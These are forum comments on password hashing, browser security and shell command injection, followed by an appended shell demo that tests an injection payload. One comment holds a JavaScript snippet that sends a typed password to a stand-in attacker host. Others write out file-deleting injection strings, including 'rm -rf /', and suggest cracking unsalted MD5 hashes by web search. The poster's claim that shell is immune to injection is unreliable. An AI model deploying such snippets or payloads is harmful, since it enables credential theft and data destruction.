my guess is that the anonymous folks try to perpetuate the myth about kids using scripts to hack websites. So they are considered no threat and can operate as they wish. It's a decoy of some sort.
yes it works. No problem on the TGV running at 320km/h
happened in Spain. The controls and security were not improved afterwards. And people still take the train.
They bombed commuter trains. You don't need to bomb HST to kill many people, there are more people on the subway or on commute.
If the technology is like the French TGV you really can't make much damage by derailing because the TGV has a good behaviour while derailing (as opposed to the German ICE)
in Europe the high speed trains run on their dedicated high speed tracks. They only get back to classic rail tracks close to the cities.
Well as we seek SLOW routines for password hashing, if you need 1000 GoL generations to get something really usable, well so that's it. Slow as hell. Exactly what is needed to secure a password.
You can't use GoL to hash a complete file, there you need a fast hash function.
Oh, the browser hashes the password.
And the box is rooted?
Put your code here:
<head>
<title>super secure website</title>
</head>
<body>
<script>
function doit() {
document.write("<img src='http://senthehackerthepassword.com/"+form.password.value+"'>");
}
setTimeout("doit()",5000) // could use onload or any other fancy technique
</script>
...
additionally they won't think about salting. I have seen many mysql databases where there are plain md5 strings.
So you can gain access by google: http://www.google.com/search?q=e10adc3949ba59abbe56e057f20f883e
What about using a cellular automaton?
A silly idea I just had yesterday.
Take a graphical representation of the password, then "hash" it by running 100 generations of life through. Store the result as the hash.
The salt would be an additional life colony so that after 100 generations you're not going to end up with a dead colony.
Oh, I can't patent the idea, I'm not the first one thinking of that. http://kestas.kuliukas.com/GameOfLife/
What if a country proposes to take a couple of guantanamo prisoners in exchange for the abolishment of all the software and "idea" patents?
Did they fix the position and allow easy pluggable possibilities so you can have a cradle or car adapter?
No, of course they did not.
my teacher gave me back a cool essay I wrote with a bad evaluation stating "you possibly could not have written this, someone else wrote it" - "why?" - "it is way too good"
Of course I did not cheat. Oh and this was like from the times the Internet did not exist!
Now this may be a compliment for my great writing skills but it was a blow to my school career. Bye bye languages and essays, at least science is more precise. So here I am doing IT :-)
I started with basic, namely GfA-Basic. Which has, surprise, no line numbers!
http://en.wikipedia.org/wiki/GFA_BASIC
And it was useable, powerful and fast.
The editor even did the auto-indentation.
Dr Steven Murdoch (Cambridge) presents: "Chip and PIN is Broken" Vulnerabilities in the EMV Protocol
https://events.ccc.de/congress/2010/Fahrplan/events/4211.en.html
Have fun take-downing them :-)
is the linked article still there?
Because now it just has the "crash" and "leather case" tags, but for the rest it talks about where and how to use connectify.
the site was popular. So it's not if the contents is on the site, only in iframes or only linked. The site is popular and mostly used for "bad" stuff.
So it gets kicked.
Well, message to other torrent searches: don't become popular :-)
Or don't use .com or other top level domain under government control.
I wonder what would have happened if the site had only an IP address instead of a DNS name.
First?
the superb application "tasker" can be used to do the same job. Just create a trigger on message reception.
wow, that's kinda small compared to today's hard disk sizes. But downloading 900G is going to last quite some time.
I don't have a windows timeline, but system calls are nice too
http://mattiasgeniar.be/2008/11/09/system-calls-in-apache-linux-vs-iis-windows/
how do you get the key into the ram?
If you have to upload it or type it in you are still subject to the gun-to-head or judge-with-jail threats.
with your reasoning, Europe does not need high speed trains. Well they were invented there.
How many 1 hour plane routes do you have in the US? All these can be replaced by train. Even 2h connections are train candidates.
"What interests me is that it recorded approximately eighteen hours of static."
http://www.imdb.com/title/tt0118884/quotes?qt0379375
because slashdot does not like me, here is my reply:
http://pastebin.com/GPtSNUS8
sorry, no reply from me because:
Your comment has too few characters per line (currently 36.1).
and then
Filter error: Please use fewer 'junk' characters.
Come on!!!!
I now hate slashdot
The same in Perl:
my $arg = "'; rm foo; #";
system "echo '$arg'";
And the same in shell
arg="'; rm foo; #"
echo $arg
I even execute it:
$ ls foo
foo
$ arg="'; rm foo; #"
$ echo $arg
'; rm foo; #
$ ls foo
foo
$
Oh, nothing happened. Exactly the expected behaviour. Shell is safe, all other languages are not.
unless you're already in the shell
That's what I'm talking about. Do it all in shell or don't call external programs. So yes, I have gone the way of implementing CGI scripts in shell. Even calling perl from shell, LOL. Shell is built to call external programs. Other languages are not.
The only real difference between an interactive shell and a noninteractive shell is the way the prompt is displayed
The difference being that the user's input (you typing) is directly going to the prompt, whereas the user input in a shellscript is only able to enter via parameters. And this makes a huge difference. As above, first assigning arg a value and then echo it works fine. But merging both into a single instruction is risky if you don't do it right (don't leave out the double quotes you used in the assignment in the 2 line version).
system 'echo', myvar
Oh, cool. Did not know that. It's a little hidden in the ruby manual.
Well, define "written in shell." Does the shell support sockets? Not that I'm aware of -- you'd at least need netcat.
Apache calls the script via cgi environment. The socket is stdin/stdout. The parsing of the cgi variables is done via an awk script. This has just logic against injections of a single quote because the awk result is then fed to a shell eval to give the shell all user variables. Yes this works!
All the rest is quite simple, just write the webpage to be sent back to stdout and you're done.
I'm less interested in what it's like for a bad programmer
There are thousands more bad programmers out there than good ones. And I have the feeling that the ratio is all the time going down. If languages would be more complex to do the bad system call than the good one, this would already improve general computer security.
* quoting: doesn't slashdot have a quote feature? Could not find one except typing the <quote> tags. Awkward.
* your example gets it wrong. It's a social engineering attack, not an attack on test.sh
All the following lines are equivalent:
test.sh '';rm -rf / #'
cat '';rm -rf / #'
ls '';rm -rf / #'
perl '';rm -rf / #'
Why? Because you call the command with an empty argument, then you call the rm. So the rm is executing in your interactive shell, not in the program you want to demonstrate to be exploitable.
You are mixing up typing in a command into an interactive shell and calling a shell with a parameter. In shell this is an interesting difference.
So let's try this.
Take the following test.pl which we want to exploit.
#!/usr/bin/perl
print "parameter 1 is:".$ARGV[0]."!\n";
We would call it how? Probably like this:
$ ./test.pl '$(echo hello)'
parameter 1 is:$(echo hello)!
but not call it by any of these because the parameter gets executed before even the perl script runs.
$ ./test.pl $(echo hello)
parameter 1 is:hello!
$ ./test.pl "'$(echo hello)'"
parameter 1 is:'hello'!
$ ./test.pl "$(echo hello)"
parameter 1 is:hello!
$ ./test.pl ' ';$(echo hello) #'
parameter 1 is: !
hello: command not found
Oh... I don't believe a simple print in perl is exploitable. So the last 4 tests are not testing test.pl but the surrounding shell.
only the first, or similar setups, are valid tests.
I hope you see the difference between the interactive shell and the called script, be it perl or bash or anything else.
* the guy's other utilities:
yes, he did not use CPAN but system calls to run other unix utilities. Like calling mailx to send an email (using a user supplied email address, wow!) and he took 3 weeks to get 1 day worth of work done.
* calling git:
well there you need to be careful how you call it. Not knowing ruby I don't know how it's calling external commands. If it's doing an equivalent of "sh -c $command" you need to sanitize arguments.
* webservice in shell
Well not really a webservice, but what about a chatroom?
* dang! Hmm, no, it doesn't seem to, though it would in every other language I've used
This is the cool feature of shell, it does not in fact execute strings which look like they may break your system.
I wrote a file up/download cgi script where any character is allowed in the filename, except / and \0
All written in shell. I was unable to get it to run a program, send me system files or overwrite files.
So that's exactly my point, compared to any other language, the shell surprisingly does not do any of the classic exploit techniques.
This is why I call shell more secure. But of course not perfect. Just better in security (and not in features or speed...)
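
Added example, not part of the original comments: a shell sketch that pushes the payload from the thread (`'; rm foo; #`) through five invocation forms and reports whether `foo` is still there, separating expansion (the string stays data) from `sh -c` or `eval` on a built string (the string is parsed as program text). The function names `try_mode` and `glob_demo` are made up for this illustration, and everything runs inside throwaway `mktemp -d` directories.

```shell
#!/bin/sh
# Constructed demo. Each run uses its own temp directory holding one file, foo.
# The payload is the string from the comments above.

# try_mode MODE -> prints "survived" or "deleted" for foo.
try_mode() {
    mode=$1
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" || exit 1
        : > foo
        arg="'; rm foo; #"
        case $mode in
            # Expansion results are data: split into words, never re-parsed.
            expand) echo $arg >/dev/null ;;
            quoted) echo "$arg" >/dev/null ;;
            # Data handed to a new shell as an argument, not as program text.
            argv)   sh -c 'echo "$1"' sh "$arg" >/dev/null ;;
            # Data pasted into program text, then parsed: the single-string
            # Perl system() call and any eval of user input work like this.
            sh_c)   sh -c "echo '$arg'" >/dev/null ;;
            eval)   eval "echo '$arg'" >/dev/null ;;
        esac
        if [ -e foo ]; then echo survived; else echo deleted; fi
    )
    rm -rf "$dir"
}

# Unquoted expansion is not inert either: it still word-splits and globs.
# Prints "foo *": the unquoted * matched the file, the quoted one did not.
glob_demo() {
    dir=$(mktemp -d) || return 1
    ( cd "$dir" && : > foo && arg='*' && echo $arg "$arg" )
    rm -rf "$dir"
}

for m in expand quoted argv sh_c eval; do
    printf '%-6s foo %s\n' "$m" "$(try_mode "$m")"
done
printf 'glob   %s\n' "$(glob_demo)"
```

The `eval` case is the one to check against the awk-then-eval CGI parsing described earlier in the thread: any quote that escapes the filter ends up in program text.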